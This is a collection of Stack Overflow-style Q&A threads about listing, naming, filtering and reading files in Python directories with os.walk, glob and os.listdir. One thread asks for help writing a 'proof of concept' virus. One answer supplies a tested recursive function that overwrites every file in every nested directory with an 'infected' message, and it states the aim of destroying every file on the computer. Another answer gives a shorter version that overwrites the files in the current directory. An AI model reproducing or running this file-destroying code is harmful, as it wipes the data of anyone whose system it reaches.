Storing files from a directory in variable names in python

I have this:
    directory = os.path.join("/home","path")
    for root,dirs,files in os.walk(directory):
        for file in files:
            if file.endswith(".csv"):
                f=open(file)
                f.close()
and 'files' contains about 300 csv files like:
['graph_2020-08-04_2020-08-17.csv',
'graph_2020-04-11_2020-04-24.csv',
'graph_2021-02-05_2021-02-18.csv',
...]
I basically want to give each of these files a name, so that I have file1, file2, file3 ... for all of them. So if I call file1, it contains graph_2020-08-04_2020-08-17.csv, for example. This is what I have:
    for i in files:
        file[i] = files[i]
But it returns
TypeError: list indices must be integers or slices, not str
What am I doing wrong in my approach?

files is a list of strings, not integers. So when you write 'for i in files', each 'i' is a string (a file name). When you then evaluate files[i], Python raises the error because a list index must be an int, not a string. Instead of 'for i in files', you could write 'for i in range(len(files))', which makes 'i' run over the integer positions 0, 1, 2, and so on.

You can use the builtin function exec() to execute a string as Python code. An example of how to do this:
    import os

    file_number = 1 # A counter to keep track of the number of files you have found
    directory = os.path.join("/home","path")
    for root, dirs, files in os.walk(directory):
        for file in files:
            if file.endswith(".csv"):
                # repr() wraps the name in quotes so the generated statement is valid Python
                exec("file" + str(file_number) + " = " + repr(file))
                file_number += 1
    print(file1) # Example usage
I think this is what you wanted to achieve.
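If the goal is only to look a file up by a label such as file1, a dictionary keyed by that label is a common alternative to creating variables with exec(). A minimal sketch, assuming a hypothetical helper named label_files and a hard-coded sample list standing in for the real os.walk results:

```python
def label_files(names, prefix="file"):
    """Map 'file1', 'file2', ... to the given names, keeping their order."""
    # enumerate(..., start=1) numbers the entries from 1 instead of 0.
    return {f"{prefix}{i}": name for i, name in enumerate(names, start=1)}


# Sample names taken from the question; a real run would collect them with os.walk.
csv_files = [
    "graph_2020-08-04_2020-08-17.csv",
    "graph_2020-04-11_2020-04-24.csv",
    "graph_2021-02-05_2021-02-18.csv",
]
labeled = label_files(csv_files)
print(labeled["file1"])  # graph_2020-08-04_2020-08-17.csv
```

The labels are ordinary dictionary keys, so they can be looped over or built from a number at run time without generating code.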

Just go with the enumerate(iterable, start) function:
    file_names = {}
    for i, file_name in enumerate(files): # you can optionally pass a start position; it defaults to 0, which is fine in your case
        file_names[i] = file_name
Remember to initialize a separate container before the loop and give it a name other than file, since file is already your loop variable. A dict works here; assigning to an index of an empty list would raise an IndexError. Do learn about the enumerate() function, it saves a lot of work. Happy coding :)

What I understood from your question is that you have a list with n elements and you want to assign each element to one of n different variables. I can't see why you would need this, but:
wolfenstein11x is right: with that for loop, i is each element rather than an index. Suppose you fix that. The code you wrote would then assign each element of files to a position in a list named file (provided that list already has at least n elements).
If I understood correctly and you really want n different variables, one for each element of the files list (I still don't know why you would need that), you might take a look at exec.
Edit after reply:
You can read each file in a loop and do whatever you like with the content:
    import os
    directory = os.path.join("/home","path")
    for root,dirs,files in os.walk(directory):
        for file in files:
            # join with root so the file is found regardless of the working directory
            with open(os.path.join(root, file), "r") as content:
                print(content.read())

Use for i in range(len(files)) instead of for i in files.

Related

How can i read specific files in a folder (files within a range)in Python

For example, I have some 43000 txt files in my folder. However, I don't want to read all of them, just some, by giving a range, like from 1.txt to 14400.txt. How can I achieve this in Python? For now, I'm reading all the files in a directory like this:
    for each in glob.glob("data/*.txt"):
        with open(each , 'r') as file:
            content = file.readlines()
        with open('{}.csv'.format(each[0:-4]) , 'w') as file:
            file.writelines(content)
Any way I can achieve the desired results?

Since glob.glob() returns a list, you can simply iterate over a section of it using a slice, something like:
    import glob
    for each in glob.glob("*")[:5]:
        print(each)
Just use variables for the slice boundaries and I think this achieves the results you are looking for.
Edit: Note that a slice that runs past the end of the list does not raise an error; it just returns fewer items, so check the length first if you need an exact number of files.
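glob.glob() returns paths in arbitrary order, so a plain slice such as [:5] does not necessarily pick the lowest-numbered files. A minimal sketch of one way to sort by the number in the name before slicing; the helper name numeric_key and the sample paths are illustrative assumptions, not part of the original answer:

```python
import os
import re


def numeric_key(path):
    """Return the first integer in the file's base name, or -1 if there is none."""
    match = re.search(r"\d+", os.path.basename(path))
    return int(match.group()) if match else -1


# Stand-in for the result of glob.glob("data/*.txt"), deliberately out of order.
paths = ["data/10.txt", "data/2.txt", "data/1.txt", "data/33.txt"]
ordered = sorted(paths, key=numeric_key)
print(ordered[:3])  # ['data/1.txt', 'data/2.txt', 'data/10.txt']
```

Sorting on the integer value rather than the string avoids the usual surprise where "10.txt" sorts before "2.txt".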

If the files have numerically consecutive names starting with 1.txt, you can use range() to help construct the filenames:
    for num in range(1, 14401):  # range() excludes its end value, so this stops at 14400
        filename = "data/%d.txt" % num
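The loop above only builds names, and some numbers in the range may have no file behind them. A minimal sketch that keeps only the paths that actually exist, assuming a hypothetical helper named existing_numbered_files and a throwaway temporary directory for the demo:

```python
import os
import tempfile


def existing_numbered_files(folder, first, last, ext=".txt"):
    """Return paths folder/<n><ext> for first <= n <= last that exist on disk."""
    paths = []
    for num in range(first, last + 1):  # + 1 because range() excludes its end value
        path = os.path.join(folder, f"{num}{ext}")
        if os.path.isfile(path):
            paths.append(path)
    return paths


# Demo in a temporary directory so the sketch runs anywhere.
with tempfile.TemporaryDirectory() as tmp:
    for n in (1, 2, 5):
        open(os.path.join(tmp, f"{n}.txt"), "w").close()
    found = [os.path.basename(p) for p in existing_numbered_files(tmp, 1, 3)]

print(found)  # ['1.txt', '2.txt']
```

For the question's case the call would look like existing_numbered_files("data", 1, 14400).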

I found a solution here: How to extract numbers from a string in Python?
    import os
    import re
    filepath = './'
    for filename in os.listdir(filepath):
        # \d+ matches whole numbers; a bare \d would match one digit at a time
        numbers_in_name = re.findall(r'\d+', filename)
        if numbers_in_name and int(numbers_in_name[0]) < 5:
            print(os.path.join(filepath, filename))
            # do other stuff with the filenames
You can use re to get the numbers in the filename. This prints all filenames where the first number is smaller than 5, for example.

How to add specific files from a series of folders to an array?

So far I've managed to compile all of the files from a series of folders using the following:
    path = r'C:\Users\keefr\Documents\Data\Pulse Characterisation\sample 7'
    subfolders = [f.path for f in os.scandir(path) if f.is_dir()]
    for sub in subfolders:
        for f in os.listdir(sub):
            print(f)
    files = [i for i in f if os.path.isfile(os.path.join(f,'*.txt')) and 'data' in f]
Where f prints out the names of all of the files. What I want to do is take only certain files from this (starts with 'data' and is a .txt file) and put these in an array called files. The last line in the above code is where I tried to do this but whenever I print files it's still an empty array. Any ideas where I'm going wrong and how to fix it?
Update
I've made some progress, I changed the last line to:
    if os.path.isfile(os.path.join(sub,f)) and 'data' in f:
        files.append(f)
So I now have an array with the correct file names. The problem now is that there's a mix of .meta, .index and .txt files and I only want the .txt files. What's the best way to filter out the other types of files?

I would probably do it like this. Since f is the filename, and is a string, you can use Python's string methods startswith() and endswith() to match exactly your criteria: starting with data and ending with .txt. If we find such a file, we append it to file_list. If you want the full path in file_list, I trust you are able to make that modification.
    import os
    path = r'C:\Users\keefr\Documents\Data\Pulse Characterisation\sample 7'
    subfolders = [f.path for f in os.scandir(path) if f.is_dir()]
    file_list = []
    for sub in subfolders:
        for f in os.listdir(sub):
            if (f.startswith("data") and f.endswith(".txt")):
                file_list.append(f)
    print(file_list)
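For the full-path variant mentioned above, one option is to scan each subfolder with os.scandir(), whose entries already carry their full path. A minimal sketch, assuming a hypothetical helper named find_data_txt and a temporary folder layout invented for the demo:

```python
import os
import tempfile


def find_data_txt(path):
    """Return full paths of files named data*.txt in the immediate subfolders of path."""
    matches = []
    for sub in os.scandir(path):
        if not sub.is_dir():
            continue
        for entry in os.scandir(sub.path):
            name = entry.name
            if entry.is_file() and name.startswith("data") and name.endswith(".txt"):
                matches.append(entry.path)  # entry.path includes the subfolder
    return sorted(matches)


# Demo layout: one subfolder holding a .txt, a .meta and an unrelated .txt file.
with tempfile.TemporaryDirectory() as root:
    run_dir = os.path.join(root, "run1")
    os.mkdir(run_dir)
    for name in ("data_a.txt", "data_a.meta", "notes.txt"):
        open(os.path.join(run_dir, name), "w").close()
    found = [os.path.relpath(p, root) for p in find_data_txt(root)]

print(found)
```

Only data_a.txt passes both checks; the .meta file fails endswith(".txt") and notes.txt fails startswith("data").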

IOError: [Errno 2] No such file or directory: when the name was made by looping over existing files

I'm trying to have the bottom part of the code iterate over some files. These files should be corresponding and are differentiated by a number, so the counter is to change the number part of the file.
The file names are generated by looking through the given files and selecting files containing certain things in the title, then having them ordered using the count.
This code works independently, in its own (lonely) folder, and prints the correct files in the correct order. However, when I use this in my main code, where file_1 and file_2 are referenced (the decoder and encoder parts of the code), I get the error in the title. There is no way there is any typo or that the files don't exist, because Python made these names itself based on existing file names.
    import os
    count = 201
    while 205 > count:
        indir = 'absolute_path/models'
        for root, dirs, filenames in os.walk(indir):
            for f in filenames:
                if 'test-decoder' in f:
                    if f.endswith(".model"):
                        if str(count) in f:
                            file_1 = f
                            print(file_1)
        indir = 'absolute_path/models'
        for root, dirs, filenames in os.walk(indir):
            for f in filenames:
                if 'test-encoder' in f:
                    if f.endswith(".model"):
                        if str(count) in f:
                            file_2 = f
                            print(file_2)
        decoder1.load_state_dict(
            torch.load(open(file_1, 'rb')))
        encoder1.load_state_dict(
            torch.load(open(file_2, 'rb')))
        print(getBlueScore(encoder1, decoder1, pairs, src, tgt))
        print_every=10
        print(file_1 + file_2)
        count = count + 1
I then need to use these files two by two.

It's very possible that you are running into issues with variable scoping, but without being able to see your entire code it's hard to know for sure.
If you know what the model files should be called, might I suggest this code:
    for i in range(201, 205):
        e = 'absolute_path/models/test_encoder_%d.model' % i
        d = 'absolute_path/models/test_decoder_%d.model' % i
        if os.path.exists(e) and os.path.exists(d):
            # e is the encoder file and d is the decoder file
            encoder1.load_state_dict(torch.load(open(e, 'rb')))
            decoder1.load_state_dict(torch.load(open(d, 'rb')))
Instead of relying on substrings appearing in a path name, which could lead to errors, this forces only the files you want to be opened. It also gets rid of any possible scoping issues.
We could clean it up a bit more but you get the idea.
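One likely cause of the error, assuming the main script runs from a different working directory than the models folder: os.walk() yields bare file names, so open(file_1) looks for the file in the current directory rather than in the folder where it was found. A minimal sketch of joining each name with its root; the helper name find_model and the sample file names are hypothetical:

```python
import os
import tempfile


def find_model(indir, kind, count):
    """Return the full path of the first '.model' file whose name contains kind and count."""
    for root, dirs, filenames in os.walk(indir):
        for f in filenames:
            if kind in f and f.endswith(".model") and str(count) in f:
                # os.walk yields bare names; join with root to get an openable path.
                return os.path.join(root, f)
    return None


# Demo with empty placeholder files in a temporary "models" directory.
with tempfile.TemporaryDirectory() as models:
    for name in ("test-decoder-201.model", "test-encoder-201.model"):
        open(os.path.join(models, name), "w").close()
    decoder_path = find_model(models, "test-decoder", 201)
    found_name = os.path.basename(decoder_path)
    found_in_models = os.path.dirname(decoder_path) == models
    missing = find_model(models, "test-decoder", 999)

print(found_name)  # test-decoder-201.model
```

Returning None when nothing matches also makes a missing file visible before torch.load is ever called.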

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.

Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
    for item in os.listdir('.'):
        print item # or do something else with item

So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"

Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

How can I get the file names and contents of a whole directory?

I have a directory named main that contains two files: a text file named alex.txt that only has 100 as its contents, and another file named mark.txt that has 400.
I want to create a function that will go into the directory, and take every file name and that file's contents and store them (into a dict?). So the end result would look something like this:
({'alex.txt', '100'}, {'mark.txt', '400'})
What would be the best way of doing this for large amounts of files?

This looks like a good job for os.walk:
    import os

    top = "main"  # the directory to read, as named in the question
    d = {}
    for path,dirs,fnames in os.walk(top):
        for fname in fnames:
            visit = os.path.join(path,fname)
            with open(visit) as f:
                d[visit] = f.read()
This solution will also recurse into subdirectories if they are present.

Using a dictionary looks like the way to go.
You can use os.listdir to get a list of the files in your directory. Then iterate over the files, opening each one, reading its contents and storing them in your dictionary.
If your main directory has some subdirectories, you may want to use the os.walk function to process them recursively. Stick to os.listdir otherwise.
Note that an item of os.listdir is relative to main. You may want to add the path to main before opening the file. In that case, use os.path.join(path_to_main, f) where f is an item of os.listdir.
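The steps described above can be sketched as follows. This is a minimal illustration, assuming a hypothetical helper named read_directory and a temporary directory that recreates the two files from the question:

```python
import os
import tempfile


def read_directory(path_to_main):
    """Return {file name: file contents} for the regular files directly inside path_to_main."""
    contents = {}
    for f in os.listdir(path_to_main):
        # os.listdir gives names relative to path_to_main, so join before opening.
        full_path = os.path.join(path_to_main, f)
        if os.path.isfile(full_path):  # skip subdirectories
            with open(full_path) as handle:
                contents[f] = handle.read()
    return contents


# Recreate the question's example: alex.txt holds 100, mark.txt holds 400.
with tempfile.TemporaryDirectory() as main:
    for name, text in (("alex.txt", "100"), ("mark.txt", "400")):
        with open(os.path.join(main, name), "w") as handle:
            handle.write(text)
    result = read_directory(main)

print(sorted(result.items()))  # [('alex.txt', '100'), ('mark.txt', '400')]
```

Each file is read fully into memory, so for very large files it may be better to store paths and read on demand.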

import os
bar = {}
[bar.update({i: open(i, 'r').read()}) for i in os.listdir('.')]
or (via mgilson)
bar = dict( (i,open(i).read()) for i in os.listdir('.') )
